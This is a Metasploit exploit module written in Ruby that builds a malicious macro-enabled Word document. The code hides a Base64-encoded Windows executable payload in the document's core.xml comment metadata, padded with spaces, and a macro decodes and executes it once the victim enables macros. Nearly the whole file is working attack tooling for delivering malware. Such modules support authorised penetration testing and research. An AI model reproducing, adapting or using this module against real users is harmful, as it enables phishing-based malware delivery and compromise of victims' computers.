Microsoft Office Word Malicious Macro Execution

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex/zip'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::EXE

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Microsoft Office Word Malicious Macro Execution",
      'Description'    => %q{
        This module generates a macro-enabled Microsoft Office Word document. The comments
        metadata in the data is injected with a Base64 encoded payload, which will be
        decoded by the macro and execute as a Windows executable.

        For a successful attack, the victim is required to manually enable macro execution.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'sinn3r' # Metasploit
        ],
      'References'     =>
        [
          ['URL', 'https://en.wikipedia.org/wiki/Macro_virus']
        ],
      'DefaultOptions'  =>
        {
          'EXITFUNC' => 'thread',
          'DisablePayloadHandler' => true
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Microsoft Office Word', {}],
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Jan 10 2012",
      'DefaultTarget'  => 0
    ))

    register_options([
      OptString.new("BODY", [false, 'The message for the document body', '']),
      OptString.new('FILENAME', [true, 'The Office document macro file', 'msf.docm'])
    ], self.class)
  end


  def on_file_read(short_fname, full_fname)
    buf = File.read(full_fname)

    case short_fname
    when /document\.xml/
      buf.gsub!(/DOCBODYGOESHER/, datastore['BODY'])
    when /core\.xml/
      b64_payload = ' ' * 55
      b64_payload << Rex::Text.encode_base64(generate_payload_exe)
      buf.gsub!(/PAYLOADGOESHERE/, b64_payload)
    end

    # The original filename of __rels is actually ".rels".
    # But for some reason if that's our original filename, it won't be included
    # in the archive. So this hacks around that.
    case short_fname
    when /__rels/
      short_fname.gsub!(/\_\_rels/, '.rels')
    end

    yield short_fname, buf
  end


  def package_docm(path)
    zip = Rex::Zip::Archive.new

    Dir["#{path}/**/**"].each do |file|
      p = file.sub(path+'/','')

      if File.directory?(file)
        print_status("Packaging directory: #{file}")
        zip.add_file(p)
      else
        on_file_read(p, file) do |fname, buf|
          print_status("Packaging file: #{fname}")
          zip.add_file(fname, buf)
        end
      end
    end

    zip.pack
  end


  def exploit
    print_status('Generating our docm file...')
    path  = File.join(Msf::Config.install_root, 'data', 'exploits', 'office_word_macro')
    docm = package_docm(path)
    file_create(docm)
    super
  end

end